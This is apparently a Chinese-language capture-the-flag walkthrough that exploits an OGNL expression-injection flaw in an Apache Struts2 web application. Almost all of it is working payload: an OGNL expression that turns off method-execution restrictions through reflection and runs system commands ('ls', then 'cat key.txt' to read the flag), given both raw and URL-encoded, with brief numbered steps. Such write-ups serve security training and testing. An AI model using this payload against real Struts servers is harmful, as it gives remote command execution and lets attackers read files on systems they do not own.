1. 输入 /${1+1}.action，发现表达式被求值（返回 2 而非原样输出），证明存在表达式注入漏洞
2. 写入 exp
${
#context[‘xwork.methodaccessor.denymethodexecution’]=false,
#m=#_memberaccess.getclass().getdeclaredfield(‘allowstaticmethodaccess’),
#m.setaccessible(true),
#m.set(#_memberaccess,true),
#q=@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(‘ls’).getinputstream()),
#q
}.action
3. 执行失败，对 exp 进行 URL 编码后再次写入
%24%7b%23context%5b%27xwork.methodaccessor.denymethodexecution%27%5d%3dfalse%2c
%23m%3d%23_memberaccess.getclass%28%29.getdeclaredfield%28%27allowstaticmethodaccess%27%29%2c
%23m.setaccessible%28true%29%2c
%23m.set%28%23_memberaccess%2ctrue%29%2c%23q%3d@org.apache.commons.io.ioutils@tostring%28@java.lang.runtime@getruntime%28%29.exec%28%27ls%27%29.getinputstream%28%29%29%2c%23q%7d.action
4. 拿 key
%24%7b
%23context%5b%27xwork.methodaccessor.denymethodexecution%27%5d%3dfalse%2c
%23m%3d%23_memberaccess.getclass%28%29.getdeclaredfield%28%27allowstaticmethodaccess%27%29%2c
%23m.setaccessible%28true%29%2c
%23m.set%28%23_memberaccess%2ctrue%29%2c%23q%3d@org.apache.commons.io.ioutils@tostring%28@java.lang.runtime@getruntime%28%29.exec%28%27cat%20key.txt%27%29.getinputstream%28%29%29%2c%23q%7d.action
payload
/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action
URL 解码后
/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat key.txt').getInputStream()),#q}.action

